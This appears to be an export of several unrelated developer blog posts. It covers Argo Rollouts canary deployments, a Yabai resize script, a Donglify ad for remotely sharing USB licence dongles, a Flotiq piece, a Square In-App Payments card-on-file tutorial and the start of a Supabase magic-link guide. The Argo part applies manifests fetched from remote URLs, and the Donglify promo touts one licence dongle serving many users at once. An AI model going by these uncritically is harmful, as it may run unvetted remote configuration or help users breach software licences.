$ kubectl apply -f [https://raw.githubusercontent.com/argoproj/argo-rollouts/master/docs/getting-started/basic/rollout.yaml](https://raw.githubusercontent.com/argoproj/argo-rollouts/master/docs/getting-started/basic/rollout.yaml)
rollout.argoproj.io/rollouts-demo created
```
Check it:
```
$ kubectl get rollouts rollouts-demo -o yaml
apiVersion: argoproj.io/v1alpha1
kind: Rollout
…
spec:
replicas: 5
revisionHistoryLimit: 2
selector:
matchLabels:
app: rollouts-demo
strategy:
canary:
steps:
- setWeight: 20
- pause: {}
- setWeight: 40
- pause:
duration: 10
- setWeight: 60
- pause:
duration: 10
- setWeight: 80
- pause:
duration: 10
template:
metadata:
creationTimestamp: null
labels:
app: rollouts-demo
spec:
containers:
- image: argoproj/rollouts-demo:blue
name: rollouts-demo
ports:
- containerPort: 8080
name: http
protocol: TCP
…
```
Here, in the `spec.strategy` the Canary deployment type is used, where in a set of steps will be performed an upgrade of the pods: first, 20% of exiting pods will be replaced with the new version, then a pause to check if they are working, then update 40%, pause again, and so on until all pods will be upgraded.
By using the plugin installed above, we can add the `--watch` argument to see the upgrade process in real-time:
```
$ kubectl argo rollouts get rollout rollouts-demo — watch
```
Install a test Service:
```
$ kubectl apply -f [https://raw.githubusercontent.com/argoproj/argo-rollouts/master/docs/getting-started/basic/service.yaml](https://raw.githubusercontent.com/argoproj/argo-rollouts/master/docs/getting-started/basic/service.yaml)
service/rollouts-demo created
```
And make an update by setting a new image version:
```
$ kubectl argo rollouts set image rollouts-demo rollouts-demo=argoproj/rollouts-demo:yellow
```
Check the progress:

Done.
_Originally published at_ [_RTFM: Linux, DevOps, and system administration_](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/)_._
* * * | setevoy |
757,108 | Yabai - Toggle Window | Window Management is no doubt the most boring stuff that no one wants to be doing. I used to have... | 0 | 2021-07-12T14:02:32 | https://dev.to/flee2free/yabai-toggle-window-4536 | Window Management is no doubt the most boring stuff that no one wants to be doing. I used to have various shortcuts and hot corners set, to size up/down the window as needed. [Magnet](https://magnet.crowdcafe.com/), [Moom](https://manytricks.com/moom/), [Spectacle](https://www.spectacleapp.com) were amongst the few that i used. Then i discovered [Yabai](https://github.com/koekeishiya/yabai), it blew my mind off. You no longer need to remember all the crazy shortcuts. The windows are neatly tiled for you to work on and as a bonus those handful of not needed shortcuts could now be used for other important actions.
Yabai automatically partitions your windows using Binary Space Partitioning. There are lot of tutorials dedicated to configure and setup Yabai. I would suggest you go look into it first. Along with Yabai please do look into [SKHD](https://github.com/koekeishiya/skhd), this helps you setup the hotkeys to manipulate the Yabai calls.
Now, lets say you are comfortable with Yababi and it's inner workings including SKHD, I would like to share a small snippet that i use all the time to quickly float and toggle the size of the window with just a single shortcut.
##### resize.sh
```
#!/bin/sh
xpt=$(yabai -m query --windows --window | jq -re '. | .frame.x')
_log() {
terminal-notifier -message $1
}
_big() {
yabai -m window --grid 16:32:4:2:24:12
_log 'big'
}
_medium() {
yabai -m window --grid 16:32:6:2:20:12
_log 'medium'
}
_small() {
yabai -m window --grid 16:32:8:3:16:10
_log 'small'
}
[[ $xpt -gt 481 ]] && _small
[[ $xpt -le 481 && $xpt -gt 361 ]] && _medium
[[ $xpt -le 361 && $xpt -gt 241 ]] && _big
[[ $xpt -le 241 ]] && _small
```
Query the current active window to retrieve the window coordinates. It uses jq to parse the JSON output that the yabai command spits out. `xpt=$(yabai -m query --windows --window | jq -re '. | .frame.x')`
Yabai uses the grid system to understand the window size. I have defined a small window as follows `yabai -m window --grid 16:32:8:3:16:10`.
Define various reference points as the x coordinates (xpt) to anchor the size of the window. Eg. in my setup the small window size falls exactly at the 481 pixel points. Use the range to define the toggle that cycles between big, medium and small.
```
[[ $xpt -gt 481 ]] && _small
[[ $xpt -le 481 && $xpt -gt 361 ]] && _medium
[[ $xpt -le 361 && $xpt -gt 241 ]] && _big
[[ $xpt -le 241 ]] && _small
```
Now, the final part to trigger this shell script, i have assigned a hot key combination with skhd as follows `ctrl + cmd - c : ~/bin/resize.sh`. You need to add this to your skhdrc (configuration file for SKHD).
This is a small inspiration and there are much more to play around with this amazing window tiling manager.
## References
- [yabai](https://github.com/koekeishiya/yabai)
- [skhd](https://github.com/koekeishiya/skhd)
- [jq](https://github.com/stedolan/jq)
- [terminal-notifier](https://github.com/julienXX/terminal-notifier)
| flee2free | |
757,379 | How to copy a software protection dongle | The most efficient method of sharing a USB dongle over the Internet or a local network is with the... | 13,609 | 2021-07-12T19:14:51 | https://dev.to/a_lernin/how-to-copy-a-software-protection-dongle-3kc6 | dongle, security, usbkey | The most efficient method of sharing a USB dongle over the Internet or a local network is with the dedicated functionality of the dongle copying software solution **Donglify.**
**Donglify** is a sophisticated software application that enables users to create a virtual copy of a USB license dongle so it can be accessed remotely over a network. All network connections are encrypted so data transmission is fully secured. The app even lets you share a single physical USB dongle simultaneously with multiple remote users.
_The instructions provided below describe the three different ways of using protected software on a network by copying USB dongle keys._ The software runs on the Windows platform and can be used in the following ways.
###How to copy a USB dongle key###
These steps enable a user to remotely connect to a computer with a physical connection to the required security key. Sharing the device across the network lets you use a virtual copy of a USB dongle to run the protected software resource from any remote location.
1. [**Create**](https://account.donglify.net/user/registration/) a Donglify account on the software’s website. After you create your account, [**download**](https://www.donglify.net/download/) and install the software on the machine with the attached dongle (the server) and the computer that will access the USB dongle copy remotely (the client).

2. Start Donglify on the two machines and log into the software using identical credentials.

3. Click "+" on the server to open a window from which you can view the USB dongles that are available to be shared. Select the device you wish to use and click _“Share”_. USB copy protection dongles that display a _“Multi-connect”_ icon can be shared simultaneously with multiple users.

4. Open Donglify on a client computer and locate the dongle shared by the server. After clicking _“Connect”_, the dongle key copy will be recognized by your system and give you the same level of functionality as if you were physically connected to the device.

Click _“Disconnect”_ when you are finished using the dongle and the connection will be terminated.
[**Here is a video guide**](https://youtu.be/FqW7ZWmRPXs )
###Using a login token to share a USB dongle copy###
Creating a token provides a secure digital key that can be shared with other users. Sharing a token with a colleague lets them use Donglify’s functionality without accessing your Donglify account. This keeps your personal information safe and gives you control over who can access a specific copy of a dongle key. If you delete a token, the individual using it is immediately logged out of the Donglify account.
Create a token using the following simple steps.
1. Log into your online Donglify account.
2. Open the _“Tokens”_ tab and click on _“Create Token”_.
3. Choose a name for the token and click _“Create”_. It will immediately be listed and available to be shared.
4. Copy the token and share it with any users using a text message, email, or any other method.
If you need to delete the token, click the red “X” next to its creation date.
To use Donglify using a token, use these steps;
1. Download and install Donglify on the computer that will access the dongle remotely.
2. Start the application, provide the token, and log into the account.
**Note: Token can be used simultaneously on multiple machines.**
[**Watch the video guide to learn more about this process.**](https://youtu.be/2bHcqDjI4c4 )
###Sending invitations to other Donglify account owners###
You can invite users to remotely access a security key. This enables you to keep your account details private while letting others access a security key remotely. Follow these steps to send an invitation to use a security key:
1. Physically attach the dongle to your computer. Launch Donglify and click “+” to view the devices that can be shared. Locate the key you want to share, check its radio button, and click _“Share”._
2. Send an invitation directly to another user by typing the email address associated with another valid Donglify account and clicking the “+” icon. Donglify displays the email address and you will receive a _“Connected”_ message when your invitation has been accepted.
When you want to end the remote session, click _“More”_ next to the user’s email address and choose _“Disconnect”._
[**Check out the video for more information**](https://youtu.be/EEOXbb19hhM )
##Who gets the most out of Donglify##
Donglify is useful in a wide variety of situations and to a range of IT professionals.
**Licensed software developers** can distribute a product trial to many customers without sending them hardware dongles. This saves time and money and lets the developer control when the dongle is removed from the Internet, shutting down access to the software.
**Large or medium business** owners who have remote technical staffs and employees can benefit from maintaining their hardware dongles in a centralized location and sharing them remotely as they are needed.
**Service providers** who need to perform software maintenance for their customers can benefit from the remote access to security keys provided by Donglify and can provide clients with more customized service.
**Owners of licensed software products protected with a USB security key** benefit by having the ability to use their licensed software without needing to carry around an extra piece of hardware.
As you can see, **copying a dongle can be important in a variety of situations.** It greatly expands the utility of protected software by eliminating the need to have the security key physically present when using an application. With the help of Donglify, using protected software requiring security keys remotely becomes a simple process. | a_lernin |
779,107 | Storing content in a structured way for later reuse - Content as a Service platforms | Publishing your content as an API If you are producing content as part of your everyday... | 0 | 2021-08-02T10:41:53 | https://dev.to/flotiq/storing-content-in-a-structured-way-for-later-reuse-content-as-a-service-platforms-36mc | cms, headlesscms, content, flotiq | 
### Publishing your content as an API
If you are producing content as part of your everyday business - it’s likely that your teams would like to repurpose the content for many different occasions and in different channels. Content written for a blog post can be often reused for social media, photos shot for an online ad can serve well for website images and so on. What’s the most convenient way to share that content across your teams? Providing content as APIs.
### What is an API
An API, or Application Programming Interface, is how developers interact with a specific system. They speak to systems through APIs; these APIs allow them to (primarily) read data from and write data to systems.
In the case of Content Management Systems - an API usually provides developers with the ability to create new content, and read, update or delete existing objects. In developer lingo - these operations are called CRUD - for Create, Read, Update and Delete.
### How does an API help to reuse content
Storing your content in a Content Management System and accessing it through an API helps put structure and organise your assets. Regardless of the kind of data you’re storing in the system - text, images, files - organising it upfront is key to reusing it later. You could argue that storing it in folders on your hard drive is good enough, but not if you intend to utilize it in different channels - for example, web apps, mobile apps, websites and so on. Publishing data in a form that is easily accessible by developers allows you to reap the benefits of modern technologies and the multitude of channels that they offer.
To properly organise your digital content, you should look at Content Management Systems. However, using a traditional CMS can often lead to mixing your real content (for example news announcements) with the description of how they should appear in the user's web browsers. That’s a big problem because it makes it impossible to reuse that content in other channels - for example, as social media posts or messages sent to users’ phones or watches. We are recently observing attempts to combat this problem. The most interesting ones seem to be the so-called headless and decoupled content management systems.
### What is a headless CMS
A headless CMS is a system that allows developers to store content inside it - it acts as a content repository and has virtually no user interface. The main focus of a headless CMS is raw data and separating content from its presentation in a particular medium. In a headless system, content is usually made accessible to developers via APIs.
A headless system provides means to define different content models. For example, you will be able to define different models for storing:
- Product data,
- Images
- Blog posts,
- Information about stores offering your product.
Once a content model is defined - you will be able to start authoring content and at the same time - developers will be able to use that content inside their applications. Regardless of the choice of programming language or development platform - a REST API will allow any developer to work with the data stored in your system.
### What is content as a service (CaaS) platforms?
Content as a service platform is a system that can publish structured content in an organised way, separated from the front-end, so it’s easily reusable using different channels and technologies. It’s often offered as a fully managed online platform. Some of the platforms worth exploring include:
- [Flotiq] (flotiq.com)
- [Contentful] (contenful.com)
- [Storyblok] (storyblok.com)
### What are the important features of a content as a service platform?
Best content as a service platform should offer easy-to-use tools for content authoring as well as for developers building services that utilize that content. From the content editors perspective - the most important features are:
- An easy to use text editor
- Content versioning
- Workflow support
- Image handling
As a developer - you would probably expect:
- Easy to use APIs,
- Ability to define and extend content models,
- Ability to define scoped API keys to access specific parts of the system,
- Powerful full-text search,
- Batch import / export of data,
- High performance, low latency content API,
- Fully-managed service.
### Why is Flotiq among the best content platforms?
Flotiq’s approach to building content models and content delivery make our system really stand out. Here are a couple of key differentiators.
- Once a content model is defined - developers are provided with a set of customized tools that are tailored to the specific needs of their project.
- Our customized, automatically generated APIs decrease the amount of work required to integrate systems with Flotiq’s content API.
- It’s extremely easy to connect systems that consume content stored in Flotiq in a no-code or low-code fashion.
- Flotiq’s powerful full-text search engine allows developers to easily implement search engines and find relevant content.
- Content editors can work comfortably with an easy-to-use interface.
- All content changes are versioned and audited.
- Complex workflows can be defined to support different publishing scenarios.
Sounds great? Try Flotiq and let me know how was your experience :) | likayeltsova |
757,496 | Card on File with React Native | Safely store and process credit cards with In-App Payments SDK on React Native | 0 | 2021-07-12T21:11:54 | https://developer.squareup.com/blog/card-on-file-with-react-native | reactnative, react, payments, mobile | ---
title: Card on File with React Native
published: true
description: Safely store and process credit cards with In-App Payments SDK on React Native
tags: reactnative, react, payments, mobile
canonical_url: https://developer.squareup.com/blog/card-on-file-with-react-native
cover_image: https://images.ctfassets.net/1wryd5vd9xez/7IbheaULjpvY7CzmXPQbi6/02fc2bb7efd290f396be864f0f820efc/thecorner_heroimage_iap_card-on-file_v1_20200319.png?w=2916&h=800&q=100&fm=webp&fit=fill&bg=rgb%3A000000
---
In this tutorial, we’ll show you how to accept payments in a React Native application using [Square’s In-App Payments SDK](https://developer.squareup.com/in-app-payments) and [React Native plugin](https://github.com/square/in-app-payments-react-native-plugin). I’ll also show you how to safely store customer card details so that they don’t have to be manually re-entered or re-swiped for future transactions.
In payment industry terms, this capability is known as [Card on File](https://squareup.com/us/en/point-of-sale/features/card-on-file), or CoF for short. For frequent transactions, e.g. ordering a Lyft or a Lime, having a card stored makes for a much snappier, lower-friction in-app user experience. Entering card details every time would be very tedious.

As a security-minded developer, I know you might be wondering: Is it safe to store a user’s credit card details? _Is this even legal?_
If you use Square, the answer is yes. Using the Square In-App Payments (IAP) SDK means that your application and database don’t actually come into contact with the real card details. Instead, your application interacts with something called a _nonce_.
A nonce is an encrypted payment token that can be exchanged with the Square API to process a payment. A card nonce represents a credit card and all the details the user typed in. The nonce is used to store cards and capture payments without compromising the user’s privacy or security. It’s just one of the key concepts of processing payments with Square that we’ll cover today.
**In this tutorial, you’ll download and run a React Native application that processes payments using Square’s In-App Payments SDK and React Native plugin, including Card on File transactions.**
## Prerequisites
No prior knowledge of React Native or Square is required, but you will need a Square account. You will need to be familiar with NPM, git and the command line.
### Square Account
A Square account will allow you to take payments and get your own API keys that you’ll use in this tutorial. Thankfully, this is easy. If you already have an active Square account, you can skip this step.
Use this link to sign up for a free account (pay only transaction fees):
> [Sign up for Square](https://squareup.com/signup?v=developers)
_Tip: During signup you can choose to order a magstripe reader, which you can use to take payments in person using the [Square Reader SDK](https://developer.squareup.com/reader-sdk)._
Finally, before continuing with the rest of the tutorial, your Square account will need to be enabled for payment processing, which means that you’ll need to provide information about the account’s owner. Visit [squareup.com/activate](http://squareup.com/activate) to enable it. If you’d prefer not to make actual card charges, your Square account comes with a [sandbox](https://developer.squareup.com/docs/testing/sandbox) that you can use instead. If you go the sandbox route, you’ll need to use the sandbox Application ID and Location ID instead in the examples below.
### Square Application and Location ID
Once you have an active Square account, you’ll need to create a new developer application in order to get your IDs and credentials.
Open the dashboard to create a new app:
> [Open the Square Application Dashboard](https://developer.squareup.com/apps)
_Tip: You’ll need to login with your Square account if you’re not logged in already._
Click on the “New Application” button. On the next screen, enter the name "In-App Payments SDK Quick Start" or something similar.

Next, click on the "In-App Payments SDK Quick Start" app to bring up your new Square Application’s settings page.
Open the Credentials page and copy down your Application ID and your Personal Access Token under ACCESS_TOKEN.

Next, open the Locations page and copy down the ID for a location that accepts card payments.
Keep your Application ID, Personal Access Token, and Location ID handy. You’ll need them later.
### Deploy backend app to Heroku
Using the Square In-App Payments SDK requires that you have a backend that the client device connects to and where the final payment processing step takes place. For the purposes of this tutorial, we’ve created an example backend we can use called the In-App Payments Server Quickstart.
The easiest way to deploy it is with cloud hosting provider [Heroku](https://www.heroku.com/), using a Deploy to Heroku button you’ll find in the GitHub README. All of the steps you’ll need to get it up and running are here:
> [Complete the In-App Payments Server Quickstart Setup](https://github.com/square/in-app-payments-server-quickstart)
Once you click the Deploy to Heroku button and signup or login to Heroku, you’ll be taken to a screen that looks like this.

Give the app a unique name and set the `ACCESS_TOKEN` value on the Heroku configuration page to the value from the previous step. Then click “Deploy app”.
_Tip: Note down the URL of your Heroku app, you’ll need it later. The format is https://<app-name>.herokuapp.com._
### Set up React Native
Next, we need to install React Native and its dependencies, which include [XCode](https://developer.apple.com/xcode/) (for iOS) and/or [Android Studio](https://developer.android.com/studio/) in order to run the application on a simulator.
_Tip: Only one of XCode or Android Studio is required to complete this tutorial and instructions are provided for both._
To set up React Native, I recommend following the guide in the React Native documentation.
> [Follow the React Native Getting Started Guide](https://facebook.github.io/react-native/docs/getting-started.html)
Here are a few tips to help you get through it quickly:
* Choose “React Native CLI Quickstart” and not “Expo CLI Quickstart”
* Choose the right Development and Target OS (Android/iOS)
* Complete the whole guide, including creating and running a new application - this will make sure your setup is working
* See the [Troubleshooting page](https://facebook.github.io/react-native/docs/troubleshooting) if you encounter any issues
Once you’re done, you should have XCode and/or Android Simulator working, as well as the react-native NPM package installed.
### Additional Requirements
The Square IAP React Native plugin has [a few build requirements](https://github.com/square/in-app-payments-react-native-plugin/blob/master/README.md#build-requirements) of its own, which you’ll want to verify against your installation. If you’ve just done a fresh install with the latest versions, you should be OK. But if not, this list will tell you what you need to upgrade before continuing.
**Android**
* Android minSdkVersion is API 21 (Lollipop, 5.0) or higher.
* Android Target SDK version: API 28 (Android 9).
* Android Gradle Plugin: 3.0.0 or greater.
**iOS**
* Xcode version: 9.1 or greater.
* iOS Base SDK: 11.0 or greater.
* Deployment target: iOS 11.0 or greater.
If you’re targeting Android, one more step is required to successfully simulate the app. You’ll need to create an Android virtual device based on the Android 9 version of the Android SDK.
* In the Android Studio welcome screen, click “Configure”
* Click “AVD Manager”
* Click “Create Virtual Device”
* Choose any common hardware and click “Next”
* Click “Download” next to “Oreo” on the System Image screen
* Once that’s done, click “Next” and finish the wizard

Pick this device to launch as the Android Simulator in the steps below.
## Set up the quickstart app
So far we’ve installed and configured our dependencies. Now we can move on to installing the React Native plugin and working with the example codebase.
In a nutshell, the React Native plugin provides a convenient set of interfaces to the native code running inside the Square In-App Payments SDK. To learn more about the background of the React Native plugin, check out this [announcement blog post](https://developer.squareup.com/blog/square-in-app-payments-sdk-for-react-native/).
### Clone the repository
For the next step, we will clone the GitHub repository that the plugin lives in: [square/in-app-payments-react-native-plugin](https://github.com/square/in-app-payments-react-native-plugin/blob/master/react-native-in-app-payments-quickstart/README.md).
git clone git@github.com:square/in-app-payments-react-native-plugin
After the clone is complete, change directories into the app.
```bash
cd in-app-payments-react-native-plugin
```
Inside of this repository, there is a React Native application that lives in the `react-native-in-app-payments-quickstart` folder. This is the quickstart application we’ll use for the rest of the tutorial.
Change directories into the application directory:
```bash
cd react-native-in-app-payments-quickstart
```
Next, install dependencies with [Yarn](https://yarnpkg.com/en/).
```bash
yarn
```
### Configure the quickstart app
The quickstart app allows the user to purchase a "Super Cookie" for $1 that grants special powers (due to the high sugar amount, of course).
Before we can fire up the app (and our blood sugar level), we need to configure it with the Square Application ID we provisioned above.
Configuration variables in the quickstart app are stored in the file `app/Constants.js` ([view on GitHub](https://github.com/square/in-app-payments-react-native-plugin/blob/master/react-native-in-app-payments-quickstart/app/Constants.js)).
```javascript
const SQUARE_APP_ID = 'REPLACE_ME';
// Make sure to remove trailing `/` since the CHARGE_SERVER_URL puts it
const CHARGE_SERVER_HOST = 'REPLACE_ME';
const CHARGE_SERVER_URL = `${CHARGE_SERVER_HOST}/chargeForCookie`;
const GOOGLE_PAY_LOCATION_ID = 'REPLACE_ME';
const APPLE_PAY_MERCHANT_ID = 'REPLACE_ME';
// constants require for card on file transactions
const CREATE_CUSTOMER_CARD_SERVER_URL = `${CHARGE_SERVER_HOST}/createCustomerCard`;
const CHARGE_CUSTOMER_CARD_SERVER_URL = `${CHARGE_SERVER_HOST}/chargeCustomerCard`;
const CUSTOMER_ID = 'REPLACE_ME';
module.exports = {
SQUARE_APP_ID,
CHARGE_SERVER_HOST,
CHARGE_SERVER_URL,
GOOGLE_PAY_LOCATION_ID,
APPLE_PAY_MERCHANT_ID,
CUSTOMER_ID,
CREATE_CUSTOMER_CARD_SERVER_URL,
CHARGE_CUSTOMER_CARD_SERVER_URL,
};
```
Open the file. On line 16, replace `REPLACE_ME` with the Application ID value from above.
On line 18, replace `CHANGE_SERVER_HOST` with the URL for your Heroku backend. Include the `https://` but <span style="text-decoration:underline;">don’t</span> include the trailing slash.
On line 20, replace `REPLACE_ME` with the Location ID value from above for the Google Pay Location ID.
### Create a customer
The last thing we need to do before we use the app is to create a customer using the [CreateCustomer](https://developer.squareup.com/docs/api/connect/v2#endpoint-customers-createcustomer) endpoint of the [Customers API](https://developer.squareup.com/docs/more-apis/customers/setup). Storing cards on file requires a customer record to attach them to.
In your terminal, run this command, first substituting <REPLACE_ME> with the value from the ACCESS_TOKEN you noted down below.
```bash
curl --request POST https://connect.squareup.com/v2/customers \
--header "Content-Type: application/json" \
--header "Authorization: Bearer <REPLACE ME>" \
--header "Accept: application/json" \
--data '{ "idempotency_key": <RANDOM_STRING>, "given_name": "Lauren Nobel" }'
```
If successful, you should see details returned that represents our new customer:
```json
{
"customer":{
"id":"RPRANDHZ9RV4B77TPNGF5D5WDR",
"created_at":"2019-06-14T15:32:50.412Z",
"updated_at":"2019-06-14T15:32:50Z",
"given_name":"Lauren Nobel",
"preferences":{
"email_unsubscribed":false
},
"creation_source":"THIRD_PARTY"
}
}
```
The `customer.id` field from the JSON is what we’ll need to eventually store a card on file for this customer from the app.
In `app/Constants.js`, the file from above, set the value of the CUSTOMER_ID constant to the customer.id field above.
```javascript
const CUSTOMER_ID = “REPLACE_ME”
```
From the quickstart app’s perspective this will now be the Square customer who’s using it.
### Start the app - iOS
You’re now ready to run the app for the first time. Before we start the app, we need to launch the iOS simulator. This comes with XCode and gives us a virtual device that looks and acts like an iPhone or iPad.
The simulator should live in your Applications folder and simply be called Simulator or Simulator.app. Once you open the app, a virtual device you have configured should boot up automatically.

Now, we’re ready to use the react-native command to run our device on the simulator. Enter this command in your terminal and hit enter:
```bash
react-native run-ios
```
If it’s your first time running, you’ll see a lot of output and the process will take a little while. Don’t worry, that’s normal. Ultimately, you should see the message `** BUILD SUCCEEDED **` and the process will exit cleanly.
Once that’s all complete, you should see our Super Cookie application loaded onto the virtual phone.

You might also have noticed that a new terminal window opened. This window is running the [Metro Bundler](https://facebook.github.io/metro/), a bundler created specifically for React Native that supports fast reloads and can handle thousands of modules at a time.
### Start the app - Android
The first step is to launch an AVD - Android Virtual Device - from the Android Studio. This virtual device will run our React Native application.
1. Open Android Studio
2. On the welcome screen, click “Configure”
3. Click “AVD Manager”
4. In the modal that opens, find the device running API 27 that we created above.
5. Click on the green Play button in the “Actions” column to launch the device.
6. Click the power button on the top right next to the virtual device to boot it.
In a minute or two, you should reach the Home screen of the Android device.

With the simulator running, we can now launch our React Native application, which will attach itself to and run on the virtual device. Type this in your project directory and hit enter:
react-native run-android
If it’s your first time running the app, it make take some time to install dependencies. That’s normal. Once you see `BUILD SUCCESSFUL` and a clean process exit, the Super Cookie app should be running on the Android virtual device.

## Interacting with the app
Now since we’ve done all of this hard work installing dependencies and configuring our environment, let’s reward ourselves with a cookie. And not just any cookie - a Super Cookie 🍪 .
On either the running iOS or Android simulator app, click the green “Buy” button. This brings up a “Place your order” modal that contains example customer details, a price, and buttons that let the user choose how they want to pay: with a credit or with a digital wallet like Apple Pay or Google Pay.

### Add a card on file
We’re going to pay with a stored credit card, so click ‘Pay with card’. We don’t have any cards on file yet for this customer, so you’ll see a message and an ‘Add card’ button.

Next, enter the details of a valid credit card and click ‘Save 🍪’.

If you entered a valid card, you’ll see a confirmation alert message. Otherwise you will see an error about what was invalid. When confirmed, the card will be attached to the record of the customer you created earlier.
**What happens behind the scenes?**
* The Square IAP SDK generates a nonce that represents the credit card.
* Our React Native application sends the nonce to our backend service running on Heroku.
* The backend service calls the [CreateCustomerCard](https://developer.squareup.com/docs/api/connect/v2#endpoint-customers-createcustomercard) endpoint of the Square API, passing the customer_id (from above) and the card nonce.
* The information returned from the Square API is stored in our React app’s state so the card type, expiration date and last 4 digits can be shown later.
_Tip: See the [Save Cards on File Cookbook](https://developer.squareup.com/docs/customers-api/cookbook/save-cards-on-file) to learn more about this flow._
**Important**: Always ask for explicit permission before saving customer contact information or cards on file. This is required by Square.
### Pay with a card on file
Assuming you successfully saved a card, you should now be able to see it on the previous UI. You can identify the card by its type, expiration date and by the last 4 digits of the account number.
_Note: The full card number cannot be shown because it was not returned from the CreateCustomerCard endpoint for privacy and security purposes._

Click the “Pay” button and then “Purchase” to confirm that you want to buy a Super Cookie for $1.

_Warning: Unless you're using the sandbox, this will charge your card and incur a transaction fee of $0.33, only $0.67 will be deposited into your linked account._
**What happens behind the scenes?**
* The app sends the customer ID and chosen card on file ID from the previous step to the backend service.
* The backend service creates a Payments API [Payment](https://developer.squareup.com/reference/square/payments-api/create-payment) request with the provided fields.
* The Square Payments API Charge endpoint processes the request and returns a [Payment](https://developer.squareup.com/reference/square/objects/Payment) object that represents the captured payment, or an error message explaining what went wrong.
### Verify transactions on the dashboard
Now that the two payments have been processed, they will show up on your Square Dashboard. Visit the dashboard to confirm.
_> [View the Transactions page on your Square Dashboard](https://squareup.com/dashboard/sales/transactions)_
## Dig into the code
Now that you’ve seen how the flow works, let’s take a quick look at the code in the Super Cookie React Native application and see what’s happening.
It will first help to understand all of the different layers of the stack.
**On the device:**
- Super Cookie React Native Application
- React Native Plugin for In-App Payments
- Square In-App Payments SDK
**Server-side:**
- In-App Payments Server Quickstart (on Heroku)
- Square API
All of the custom code used in this tutorial lives inside either the Super Cookie application or IAP Server Quickstart. The Square IAP SDK and React Native Plugin for IAP are officially maintained packages from Square.
### React components
The Super Cookie quickstart application has one main level component called `HomeScreen.js`. This component decides what is rendered based on the state of the application.
When the user first clicks ‘Buy’, a modal dialog appears from the bottom of the screen. The contents of the modal dialog change as the user walks through the flow. There are 3 views, backed by one component each:
* `OrderModal`: Shows transaction details and buttons for payment methods
* `CardsOnFileModal`: Shows list of cards on file and a button to add a card
* `PendingModal`: Shows an activity indicator when a transaction is being processed
The code for these components is in the `app/components` folder of the quickstart application repository. The main job of these components is to build markup for the interface, apply CSS, and trigger events when certain areas of the screen are touched.
### React Native IAP Plugin interfaces
Interaction with the React Native plugin and underlying native SDKs is set up in the HomeScreen component.
Up at the top of the files, we can see these interfaces being imported.
```javascript
import {
SQIPCardEntry,
SQIPApplePay,
SQIPCore,
SQIPGooglePay,
} from 'react-native-square-in-app-payments';
```
SQIPCore is used to send your Square application ID down to the native layer.
The `startCardEntryFlow()` method of SQIPCardEntry is used to show the dialog for capturing credit card details. This dialog is created by the underlying native SDK so its fast and smooth. The method accepts 3 parameters - a configuration object, a success function, and a cancel function. The success function is passed a nonce that represents the card that the user entered, which can then be used to create a transaction or store a card on file.
The `setIOSCardEntryTheme()` is used to customize the look and feel of the dialog, and that’s how we added the 🍪 emoji to the “Save” button at the dialog. The `completeCardEntry()` method closes the dialog.
See the [React Native plugin’s technical reference](https://github.com/square/in-app-payments-react-native-plugin/blob/master/docs/reference.md) for a full list of interfaces, features and customizations that your application can take advantage of.
## Conclusion
In this tutorial, we’ve shown how to take a Card on File payment within a React Native application, using the [Square In-App Payments SDK](https://squareup.com/us/en/developers/in-app-payments) and the [React Native Plugin for In-App Payments SDK.](https://github.com/square/in-app-payments-react-native-plugin)
Even if you’re not selling super cookies, the instructions and example code here should help you integrate Square into your React Native application to create a great user experience for whatever you’re selling.
Once you’re ready to do that, your next step will be to read the [Getting Started with the React Native Plugin for In-App Payments SDK](https://github.com/square/in-app-payments-react-native-plugin/blob/master/docs/get-started.md) guide on GitHub, which shows you step-by-step how to add the plugin to an existing React Native app. Square Developer Evangelist [Richard Moot](https://twitter.com/wootmoot) has even created a video to walk you through it step-by-step.
{% youtube PoVuik5jqxI %}
If you want to keep up to date with the rest of our guides and tutorials, be sure to follow our [blog](https://medium.com/square-corner-blog) & our [Twitter](https://twitter.com/SquareDev) account, and sign up for our [forums](https://developer.squareup.com/forums).
Thanks for reading!
| mootrichard |
757,537 | Magic Link Authentication and Route Controls with Supabase and Next.js | In this post, we'll build out a Next.js app that enables navigation, authentication, authorization, redirects (client and server-side), and a profile view. | 0 | 2021-07-13T13:15:36 | https://dev.to/dabit3/magic-link-authentication-and-route-controls-with-supabase-and-next-js-leo | webdev, javascript, react, nextjs | ---
title: Magic Link Authentication and Route Controls with Supabase and Next.js
published: true
description: In this post, we'll build out a Next.js app that enables navigation, authentication, authorization, redirects (client and server-side), and a profile view.
tags: webdev, javascript, react, nextjs
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hh20qf2iasphmrzk93h6.png
---
> View the video tutorial of this guide [here](https://www.youtube.com/watch?v=oXWImFqsQF4). As a disclaimer, Supabase is also a sponsor of my YouTube channel
While [Supabase](https://supabase.io/) is widely known for their real-time database and API layer, one of the things I like about it is the number of easy to set up [authentication mechanisms](https://supabase.io/docs/guides/auth) it offers out of the box.

### Magic Link
One of my favorites is Magic Link. You've probably used magic link in the past. Magic link sends a link to the user via email containing a link to authenticate with the service via a custom URL and access token.
When the user visits the URL, a session is set in their browser storage and the user is redirected back to the app, authenticating the user in the process.
This is becoming a very popular way to authenticate users as they do not have to keep up with another password, it provides a really great user experience.
### Next.js
With Next.js, you have the ability to not only protect routes with client-side authorization, but for added security you can do server-side authorization and redirects in [`getServerSideProps`](https://nextjs.org/docs/basic-features/data-fetching#getserversideprops-server-side-rendering) if a cookie has been set and is available in the request context.
This is also where Supabase comes in handy. There is built-in functionality for setting and getting the cookie for the signed in user in SSR and API routes:
#### Setting the user in an API route
```javascript
import { supabase } from '../../client'
export default function handler(req, res) {
supabase.auth.api.setAuthCookie(req, res)
}
```
#### Getting the user in an SSR or API route
```javascript
export async function getServerSideProps({ req }) {
const { user } = await supabase.auth.api.getUserByCookie(req)
if (!user) {
return {
props: {}
}
}
/* if user is present, do something with the user data here */
return { props: { user } }
}
```
Server-side redirects are typically preferred over client-side redirects from an SEO perspective - it's harder for search engines to understand how client-side redirects should be treated.
You are also able to access the user profile from an API route using the `getUserByCookie` function, opening up an entirely new set of use cases and functionality.
With Next.js and Supabase you can easily implement a wide variety of applications using this combination of SSG, SSR, and client-side data fetching and user authorization, making the combination (and any framework that offers this combination of capabilities) extremely useful and powerful.
### What we'll be building
In this post, we'll build out a Next.js app that enables navigation, authentication, authorization, redirects (client and server-side), and a profile view.
The project that we'll be building is a great starting point for any application that needs to deal with user identity, and is a good way to understand how user identity works and flows throughout all of the different places in a project using a modern hybrid framework like Next.js.
> The final code for this project is located [here](https://github.com/dabit3/supabase-nextjs-auth)
## Building the app
To get started, you first need to create a Supabase account and project.
